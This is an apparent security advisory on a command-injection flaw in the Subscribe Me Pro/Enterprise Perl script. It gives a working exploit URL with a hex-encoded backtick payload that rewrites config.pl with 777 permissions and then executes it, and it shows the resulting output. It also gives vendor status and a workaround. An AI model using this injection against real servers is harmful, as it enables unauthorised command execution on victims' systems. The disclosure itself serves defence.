Subscribe Me Pro/Enterprise is "a mailing list management script developed by siteinteractive". Various flaws exist in setup.pl that can allow an attacker to inject shell commands using a back ticked variable injection flaw into config.pl, and then exploiting a permission problem to execute config.pl.
Exploit:
This attack tricks the perl script setup.pl into thinking that you have just installed Subscribe Me and wish to set it up. When doing this setup.pl will attempt to write all your configuration variables to config.pl. There is some input validation done in setup.pl, but this can be easily bypassed by hex encoding all data that you send.
Run though of the exploit:
First we connect and inject our exploit command of '/usr/bin/id > id' and tell setup.pl to create all files with a mode of 777. http://victim.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl
&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh
¬ification="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64` %20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.
This will return a page saying, "Please set your administration password" (you will not be able to).
This has now written the following data to config.pl $notification = "" .`/usr/bin/id > id` . ""; (note the back ticks)
Moreover, config.pl is now set to -rwxrwxrwx. Now we request http://victim.com/cgi-bin/config.pl to execute our perl.
And respectively http://victim.com/cgi-bin/id is now created and contains: uid=48(apache) gid=48(apache) groups=48(apache)
Using this exploit, it is possible to inject any system commands.
Vendor status:
Company was contacted via email (support@) on Monday 15 December, they were notified that the exploit would be released on 19 December, and they were told how to fix the problem. No reply was heard back from the company, and no official fix has been released.
Workaround:
Remove setup.pl once installed, in addition chmod config.pl to read only.
